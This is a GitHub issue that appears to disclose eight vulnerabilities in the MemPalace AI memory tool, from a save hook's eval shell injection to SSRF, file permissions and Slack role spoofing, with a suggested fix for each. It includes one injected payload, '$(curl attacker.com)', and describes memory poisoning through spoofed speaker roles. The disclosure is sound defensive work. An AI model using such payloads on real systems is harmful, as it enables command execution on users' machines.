Security Audit: 8 unreported vulnerabilities — data leakage, shell injection, file permissions

## Security Audit Report

Hi Milla, Ben, and the MemPalace community!

I ran a full security audit on the v3.2.0 codebase (commit `6614b9b`, `develop` branch) before deploying MemPalace in my own workflow. I found **8 previously unreported vulnerabilities** that I'd like to flag — and I'm happy to submit PRs for all of them.

I checked existing issues and PRs before filing this. #401 (security hardening RFC), #477 (search limit), #438 (precompact session_id + regex escape), and #782 (ChromaDB telemetry) cover some related ground but the findings below are **not covered by any existing issue or PR**.

---

## CRITICAL

### 1. Wikipedia SSRF in `entity_registry.py` — violates local-first guarantee

**File:** `mempalace/entity_registry.py`, lines 176–257

`_wikipedia_lookup()` makes an outbound HTTPS GET to `https://en.wikipedia.org/api/rest_v1/page/summary/{word}` whenever `research()` is called. This is in the core package, not a benchmark or optional module.

- Any entity name extracted during mining gets sent to Wikipedia
- User's IP is disclosed to Wikipedia (and any network observer)
- Directly violates CLAUDE.md: *"Privacy by architecture — The system physically cannot send your data because it never leaves your machine"*

Additionally, if Wikipedia returns 404, the word is classified as `"person"` with 0.70 confidence (lines 246–254), which poisons the entity registry with false positives.

**Suggested fix:** Make `research()` local-only by default. Require explicit `allow_network=True` opt-in for Wikipedia lookups, and return `"unknown"` with low confidence on 404 instead of asserting person.

---

### 2. Shell injection via `eval` in `mempal_save_hook.sh` — `stop_hook_active` not sanitized

**File:** `hooks/mempal_save_hook.sh`, lines 68–80

The save hook uses `eval` to parse Python output into shell variables. The `stop_hook_active` field is **not passed through the `safe()` lambda** (unlike `session_id` and `transcript_path`):

```bash
eval $(echo "$INPUT" | python3 -c "
...
safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
print(f'SESSION_ID=\"{safe(sid)}\"')
print(f'STOP_HOOK_ACTIVE=\"{sha}\"')       # ← NOT sanitized
print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
")
```

If the JSON input contains `"stop_hook_active": "$(curl attacker.com)"`, bash will execute the command substitution inside `eval`.

**Suggested fix:** Validate `stop_hook_active` is strictly `True` or `False` before printing:

```python
sha_raw = data.get('stop_hook_active', False)
sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1') else 'False'
```

---

### 3. `transcript_path` from stdin opens arbitrary files in `hooks_cli.py`

**File:** `mempalace/hooks_cli.py`, lines 42–77, 124–126

`transcript_path` is read from the stdin JSON and passed to `_count_human_messages()` which calls `Path(transcript_path).expanduser()` and opens the file. No containment check ensures the path is within the expected Claude Code sessions directory.

**Suggested fix:** Validate the resolved path is under the expected root (e.g., `~/.claude/projects`) and has a `.jsonl`/`.json` extension before opening.

---

## HIGH

### 4. Arithmetic injection in `mempal_save_hook.sh`

**File:** `hooks/mempal_save_hook.sh`, lines 120–124

```bash
LAST_SAVE=$(cat "$LAST_SAVE_FILE")
SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))
```

`LAST_SAVE` is read from a state file and used directly in `$((...))` without validating it's an integer. Bash arithmetic evaluates command substitutions.

**Suggested fix:**
```bash
if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
    LAST_SAVE="$LAST_SAVE_RAW"
fi
```

---

## MEDIUM

### 5. File permissions — 6 locations create sensitive files world-readable

On Linux with default umask (022), these files are created `644`/`755` (world-readable):

| File | What's exposed |
|------|---------------|
| `hooks_cli.py:84` — `~/.mempalace/hook_state/` | Session IDs, timestamps |
| `entity_registry.py:311` — `entity_registry.json` | Names of all people, relationships, aliases |
| `knowledge_graph.py:53` — `knowledge_graph.sqlite3` | Every temporal fact ever stored |
| `exporter.py:51` — export output directory | Complete verbatim memory palace |
| `config.py:227` — `people_map.json` | Name mappings for all people |
| `mcp_server.py:92` — WAL file (TOCTOU race) | Write audit log |

**Suggested fix:** Apply `chmod(0o700)` to directories and `chmod(0o600)` to files immediately after creation, with `try/except (OSError, NotImplementedError): pass` for Windows compatibility.

---

### 6. Slack transcript role spoofing in `normalize.py`

**File:** `mempalace/normalize.py`, lines 276–306

The Slack JSON parser assigns `"user"` to the first speaker and `"assistant"` to the second, purely by position. A crafted Slack export where an attacker's message is first gets stored with role `"user"`, making attacker-written text appear as the memory owner's own words in all future retrieval.

**Suggested fix:** Label Slack-sourced transcripts with a provenance header indicating multi-party chat origin, and don't assign `user`/`assistant` roles to arbitrary speakers.

---

### 7. `palace_path` from env var not normalized

**File:** `mempalace/config.py`, lines 143–148

`MEMPALACE_PALACE_PATH` from environment is used as-is, without `os.path.abspath()` or `expanduser()`. This differs from the `--palace` CLI arg (which gets `abspath` at `mcp_server.py:62`). A value with `../` components could redirect palace storage.

**Suggested fix:** Apply `os.path.abspath(os.path.expanduser(env_val))` in the config loader.

---

### 8. Date fields in KG tools not validated

**File:** `mempalace/mcp_server.py`, line 748; `knowledge_graph.py`, lines 219–242

`as_of`, `valid_from`, `valid_to` parameters from MCP calls reach SQLite without format validation. While parameterized queries prevent SQL injection, invalid date strings silently break temporal filtering (queries return empty results instead of matching facts).

**Suggested fix:** Add an ISO-8601 date format validator at the MCP boundary:
```python
_DATE_RE = re.compile(r'^\d{4}-(?:0[1-9]|1[0-2])(?:-(?:0[1-9]|[12]\d|3[01]))?$')
```

---

## Relationship to existing issues/PRs

- **#401** (security hardening RFC) — our findings 2, 4, 5, 8 align with that RFC's scope. We can implement fixes for the parts not yet covered.
- **#438** — covers precompact `session_id` sanitization and regex escape. Our finding 2 covers the **save hook** `eval` issue which #438 does not address.
- **#477** — search limit exhaustion. Not duplicated here.
- **#782** — ChromaDB telemetry. Not duplicated here.

## Next steps

I'm happy to submit focused PRs for each finding, targeting `develop`:

- `fix/security-wikipedia-ssrf` — Finding 1
- `fix/security-hook-injection` — Findings 2, 3, 4
- `fix/security-file-permissions` — Finding 5
- `fix/security-normalize-roles` — Finding 6
- `fix/security-config-validation` — Findings 7, 8

Let me know if you'd prefer a different grouping or if any of these are already being worked on internally.

Thanks for building MemPalace — it's a great project and I want to help make it solid.

— @Kesshite

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Security Audit: 8 unreported vulnerabilities — data leakage, shell injection, file permissions #809

Security Audit Report

CRITICAL

1. Wikipedia SSRF in `entity_registry.py` — violates local-first guarantee

2. Shell injection via `eval` in `mempal_save_hook.sh` — `stop_hook_active` not sanitized

3. `transcript_path` from stdin opens arbitrary files in `hooks_cli.py`

HIGH

4. Arithmetic injection in `mempal_save_hook.sh`

MEDIUM

5. File permissions — 6 locations create sensitive files world-readable

6. Slack transcript role spoofing in `normalize.py`

7. `palace_path` from env var not normalized

8. Date fields in KG tools not validated

Relationship to existing issues/PRs

Next steps

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

File	What's exposed
`hooks_cli.py:84` — `~/.mempalace/hook_state/`	Session IDs, timestamps
`entity_registry.py:311` — `entity_registry.json`	Names of all people, relationships, aliases
`knowledge_graph.py:53` — `knowledge_graph.sqlite3`	Every temporal fact ever stored
`exporter.py:51` — export output directory	Complete verbatim memory palace
`config.py:227` — `people_map.json`	Name mappings for all people
`mcp_server.py:92` — WAL file (TOCTOU race)	Write audit log

Security Audit: 8 unreported vulnerabilities — data leakage, shell injection, file permissions #809

Description

Security Audit Report

CRITICAL

1. Wikipedia SSRF in entity_registry.py — violates local-first guarantee

2. Shell injection via eval in mempal_save_hook.sh — stop_hook_active not sanitized

3. transcript_path from stdin opens arbitrary files in hooks_cli.py

HIGH

4. Arithmetic injection in mempal_save_hook.sh

MEDIUM

5. File permissions — 6 locations create sensitive files world-readable

6. Slack transcript role spoofing in normalize.py

7. palace_path from env var not normalized

8. Date fields in KG tools not validated

Relationship to existing issues/PRs

Next steps

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions

1. Wikipedia SSRF in `entity_registry.py` — violates local-first guarantee

2. Shell injection via `eval` in `mempal_save_hook.sh` — `stop_hook_active` not sanitized

3. `transcript_path` from stdin opens arbitrary files in `hooks_cli.py`

4. Arithmetic injection in `mempal_save_hook.sh`

6. Slack transcript role spoofing in `normalize.py`

7. `palace_path` from env var not normalized